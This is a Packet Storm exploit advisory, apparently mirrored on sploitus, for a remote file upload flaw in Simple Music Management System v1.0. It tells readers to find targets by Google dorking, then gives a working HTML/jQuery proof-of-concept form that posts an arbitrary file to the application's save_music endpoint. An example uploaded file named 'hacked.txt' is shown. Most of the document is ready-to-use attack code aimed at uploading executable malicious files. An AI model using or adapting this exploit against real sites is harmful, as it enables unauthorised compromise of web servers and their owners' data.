Share
## https://sploitus.com/exploit?id=PACKETSTORM:181930
=============================================================================================================================================  
| # Title : Simple Music Management System v1.0 Remote File Upload Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://www.kashipara.com/project/php/12978/music-management-system-in-php-php-project-source-code |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] The following html code uploads a executable malicious file remotely .  
  
[+] Go to the line 27.  
  
[+] Set the target site link Save changes and apply .   
  
[+] save code as poc.html .  
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>Music Upload Form</title>  
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>  
</head>  
<body>  
  
<form id="manage-music" enctype="multipart/form-data">  
<label for="cover-input">Cover:</label>  
<input type="file" id="cover-input" name="cover" onchange="displayImgCover(this)">  
<br>  
<img id="cover" src="#" alt="Cover Preview" style="max-width: 200px; display:none;">  
<br>  
<input type="submit" value="Upload">  
</form>  
  
<script>  
// Handle form submission with AJAX  
$('#manage-music').submit(function(e){  
e.preventDefault();  
start_load(); // Placeholder for loader function  
  
$.ajax({  
url: 'http://127.0.0.1/music/ajax.php?action=save_music',  
data: new FormData($(this)[0]),  
cache: false,  
contentType: false,  
processData: false,  
method: 'POST',  
type: 'POST',  
success: function(resp) {  
if (resp == 1) {  
alert_toast('Data successfully saved', "success");  
setTimeout(function(){  
end_load(); // Placeholder to stop loader  
_redirect('http://127.0.0.1/music/index.php?page=music_list'); // Redirect to music list page  
}, 2000);  
}  
}  
});  
});  
  
// Function to display the selected image (cover preview)  
function displayImgCover(input) {  
if (input.files && input.files[0]) {  
var reader = new FileReader();  
reader.onload = function (e) {  
$('#cover').attr('src', e.target.result).show(); // Show the image preview  
};  
reader.readAsDataURL(input.files[0]);  
}  
}  
  
// Placeholder functions for loader and redirect  
function start_load(){  
console.log("Loading started...");  
// Add your loading spinner code here  
}  
  
function end_load(){  
console.log("Loading finished.");  
// Add your code to stop the loading spinner here  
}  
  
function alert_toast(message, type){  
alert(message); // Basic alert, replace with a toast library if needed  
}  
  
function _redirect(url){  
window.location.href = url;  
}  
</script>  
  
</body>  
</html>  
  
  
[+] http://127.0.0.1/music/assets/uploads/1726232340_hacked.txt  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================